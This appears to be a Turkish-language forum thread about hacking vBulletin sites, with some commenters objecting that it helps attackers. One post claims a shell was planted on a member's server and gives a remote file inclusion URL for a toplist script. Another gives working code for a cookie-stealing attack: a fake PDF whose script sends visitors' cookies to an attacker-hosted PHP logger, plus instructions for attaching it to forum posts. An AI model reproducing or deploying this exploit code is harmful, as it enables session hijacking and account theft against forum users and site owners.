ustamın dediği doğru zaten install klasörünü kökten silmeden admin panele giremezsiniz gireni tanımıyorum...

elazıglı168 serverınızda acık var bılgıne senın olayı cozdum arkadasım sana atılan ındex shelle yapıldı suan serverınızda bana aıt bı shell bulunuyor ıstersen benımle ırtıbata gec ozelden

ıste sıze shell ın bı ornegı www.googletr.info tıklayın sadece tehlıkelerı gorun dıye bıde sıze addvark toplıst acıgı verıcem

http://www.site.net/toplist/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=shell adresı vblerde kullanılan toplıst scrıpt acıgı

sağol kardeş güzel bilgiler siteden ayrıldım uğraşamıycam artık ama senle özelden görüşelim bi ara

ben şimdi bu dökümanla hacker olurum bılgıler ıcın tskler

herseyı guzel anlatmıssında hocam su korunma yollarınıda yazsaydın ne ıyı olacaktı

peki bu flash kodları nasıl kapatabiliriz sitede yardımcı olabilirmisiniz...

iyi hoş döküman olmuşta bunlar siteyi korumanın yanında bide lamer ruhlu insanlara pahabiçilemez bi döküman olmuşlar.. şimdi adam bu kodları, bu açıkları görse hemen uygulamaz ve siteyi hacklemeye çalışmazmı??
ben bu hack işinden tema-tr hacklendiği günden beri nefret ediyorum.. ve bu döküman yukardada yazdığım gibi pahabiçilemez bi lamer dökümanı olmuş...

Amacım bılgılendırmek bılerek elazıglı arkadasım konuyu sabıt yaptı sıze dusen bu acıklar ıcın onlem almak

Notepad ile yeni bir dosya açıp aşağıdaki kodu içine yapıştırın ve testmagic.pdf olarak kaydedin.


Code:

<script>
d o c u m e n t.write('<img src="http://host adresiniz/c.php?c='+document.cookie+'" WIDTH=0 HEIGHT=0>');
document.location.href="https://www.google.com/adsense/testmagic.pdf";
</script>
Aşağıdakini de c.php olarak kaydedip bir host a atın.


Code:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer= getenv ('HTTP_REFERER');
$fl = fopen('megalog.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n");
fclose($fl);
?>
Nasıl kullanılacağına geçelim :

vbulletin 3.5.4 kullanan bir foruma üye olup mesajımızı yazıyoruz. daha sonra yazdığımız mesaja testmagic.pdf i ekliyoruz. eğer o sitede açık varsa mesajı gören kullanıcıların cookie si hostunuzdaki log.txt e kaydedilecek.

Kodlardaki bazı adresler yerine biliyorsunuz ki kendi adreslerinizi yazacaksınız.Bu açık sadece IE kullananlarda geçerlidir.

Not=Mach 1 ın hacklenme olayı bu pdf dosyasına ındex kodları koyulması ıle hackleme degıl deface dıyelım ama ben 1 seneyı geckındır burdan yararlanıyorum vb yıde burdan ogrendım sayılır yazıktır emege burda denemeyın bazı seylerı tematr ye yapılanda sırf bı lamerlık mıllet tema nerden bulcak sımdı dusunmek lazım

ya zaten bu hack olayına anlam veremiyorumki ya hackleyecen ne olacak millet bi şekilde bilgi paylaşıyor sana zararı nedir....Eğleniyor yada bilgileniyor anlamadığım hacklenınce cebi paramı doluyor kariyermi yapıyor Bari yapacaksan gerçektende hacklenmeyi hak eden sitelere yap.....Kusura bakmayın ama istersenizde banlayın bence durup dururken bi siteyle uğraşmak bizim Türk dil tabiriyle (arkadan vurmak) şerefsizlikten başka bişi değil.....


Bu arada bilgilerin için sağol usta en azından bizler önlemimizi alıyoruz...